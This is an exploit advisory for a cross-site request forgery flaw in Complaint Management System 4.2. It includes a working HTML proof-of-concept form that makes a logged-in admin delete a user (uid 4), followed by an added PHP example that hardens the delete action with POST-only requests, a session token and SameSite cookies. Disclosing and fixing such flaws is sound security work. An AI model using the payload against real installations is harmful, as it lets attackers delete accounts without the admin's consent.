# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.2
# Tested on: Xampp
# Credit: İsmail BOZKURT
*************************************************
Detail:
You can perform a CSRF attack against all the functions.
----------------------------------------------
CSRF PoC for Delete User
----------------------------------------------
This request is performed as a GET request with the uid parameter.
------------------------------------------------------------------------
<html>
  <body>
    <script>history.pushState('','','/')</script>
    <form action="http://localhost/cms/admin/manage-users.php">
      <input type="hidden" name="uid" value="4"/>
      <input type="hidden" name="" value=""/>
      <input type="hidden" name="action" value="del"/>
      <input type="submit" value="Submit request"/>
    </form>
  </body>
</html>
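
A hardened form of the delete check, as an added example that is not the vendor's code or part of the original advisory: the action is accepted only over POST and only with a per-session token compared using hash_equals(). The function names, the csrf_token field and the sample requests are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: issue one random token per admin session.
// The admin page would embed it as a hidden field in every state-changing form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hypothetical check: returns the uid to delete, or null if the request is rejected.
function authorize_delete(string $method, array $params, array $session): ?int
{
    // Refuse state changes over GET, the method the advisory's form uses by default.
    if ($method !== 'POST') {
        return null;
    }
    // A cross-site page cannot read the session token, so it cannot supply it.
    $sent = $params['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return null;
    }
    if (($params['action'] ?? '') !== 'del') {
        return null;
    }
    $uid = filter_var($params['uid'] ?? null, FILTER_VALIDATE_INT,
                      ['options' => ['min_range' => 1]]);
    return $uid === false ? null : $uid;
}

// Constructed sample requests (not captured traffic).
$session = [];
$token = csrf_token($session);
$cases = [
    'cross-site GET, no token'  => ['GET',  ['uid' => '4', 'action' => 'del']],
    'cross-site POST, no token' => ['POST', ['uid' => '4', 'action' => 'del']],
    'POST with wrong token'     => ['POST', ['uid' => '4', 'action' => 'del', 'csrf_token' => 'guess']],
    'same-site POST with token' => ['POST', ['uid' => '4', 'action' => 'del', 'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $params]) {
    $uid = authorize_delete($method, $params, $session);
    printf("%-28s %s\n", $label, $uid === null ? 'rejected' : "delete uid $uid");
}
```

Setting the SameSite attribute (Lax or Strict) on the session cookie adds a second layer alongside the token.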